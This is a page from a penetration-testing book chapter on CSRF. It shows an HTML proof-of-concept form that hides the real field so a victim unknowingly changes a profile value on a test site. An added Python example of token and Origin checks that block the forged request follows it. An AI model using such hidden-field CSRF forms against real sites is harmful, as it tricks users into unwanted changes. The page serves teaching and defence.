Page 112 - Hands-On Bug Hunting for Penetration Testers
CSRF and Insecure Session Authentication Chapter 6
But if the intent is to deceive the target of the CSRF attack into doing what we want (unwittingly changing Mandella's rank), why are we showing them the fields at all? Why offer the user any chance to see or manipulate the nick input field? See the following:
<html>
<form enctype="application/x-www-form-urlencoded" method="POST"
      action="http://webscantest.com/crosstraining/aboutyou.php">
    <label>fname</label><input type="text" value="William" name="fname">
    <label>nick</label><input type="text" value="Private Mandella" name="other_nick">
    <label>lname</label><input type="text" value="Mandella" name="lname">
    <label>submit</label><input type="text" value="submit" name="submit">
    <input type="submit" value="http://webscantest.com/crosstraining/aboutyou.php">
    <input type="hidden" value="Major Mandella" name="nick">
</form>
</html>
In this last snippet, we've given the other_nick input field the nick label our hapless user is expecting, while making the real nick input hidden. That hidden field carries our secret value: the rank we think the major deserves.
Of course, when you're creating a CSRF PoC as part of a bug-report submission, you want
to make sure you're not actually changing or modifying sensitive information (such as a
password or transaction amount), though it can be useful to make a small alteration in
order to illustrate the possible impact of the bug.
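For the defensive side of the same form, here is an added example (not code from the book or from webscantest.com) of the server-side check that defeats this PoC: a per-session synchronizer token plus an Origin check. The handler, the SERVER_SECRET placeholder, the attacker origin and the request dicts are all constructed for illustration.

```python
import hmac
import hashlib
from urllib.parse import urlsplit

# Constructed example: a CSRF guard for a profile form such as aboutyou.php.
# SERVER_SECRET is a placeholder; a real deployment loads a random secret from config.
SERVER_SECRET = b"replace-with-a-random-32-byte-secret"
ALLOWED_ORIGIN = "http://webscantest.com"

def csrf_token(session_id: str) -> str:
    """Derive a synchronizer token bound to one session. An HMAC keyed with the
    server secret cannot be forged by an attacker's page and is useless for any
    other session, so a hidden field copied from elsewhere will not validate."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def accept_post(request: dict) -> tuple:
    """Decide whether a POST may change the profile. `request` is a constructed
    stand-in for a framework request object with 'session_id', 'headers' and
    'form'. Two independent checks: the Origin (or Referer) must be this site,
    and the form must carry the token issued for this session."""
    headers, form = request["headers"], request["form"]
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin:
        return False, "missing Origin/Referer"
    parts = urlsplit(origin)
    if f"{parts.scheme}://{parts.netloc}" != ALLOWED_ORIGIN:
        return False, f"cross-site origin {origin!r}"
    expected = csrf_token(request["session_id"])
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(expected, supplied):  # constant-time comparison
        return False, "bad or missing csrf_token"
    return True, f"nick updated to {form.get('nick')!r}"

# Legitimate submission from the site's own page, carrying its token.
LEGIT = {"session_id": "sess-123",
         "headers": {"Origin": "http://webscantest.com"},
         "form": {"nick": "Private Mandella", "csrf_token": csrf_token("sess-123")}}

# The cross-site form from the text: the browser still attaches the victim's
# session cookie, but Origin is the hosting page and no token is present.
FORGED = {"session_id": "sess-123",
          "headers": {"Origin": "http://attacker.example"},
          "form": {"nick": "Major Mandella"}}

if __name__ == "__main__":
    print(accept_post(LEGIT))   # (True, "nick updated to 'Private Mandella'")
    print(accept_post(FORGED))  # (False, "cross-site origin 'http://attacker.example'")
```

Either check alone stops the hidden-field PoC; both together also cover browsers that omit Origin on some requests and token leaks that do not come with a matching session.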
Validating Your CSRF PoC
Now that we've created a basic CSRF PoC, we can go about applying it to prove the
presence of a CSRF vulnerability.
[ 97 ]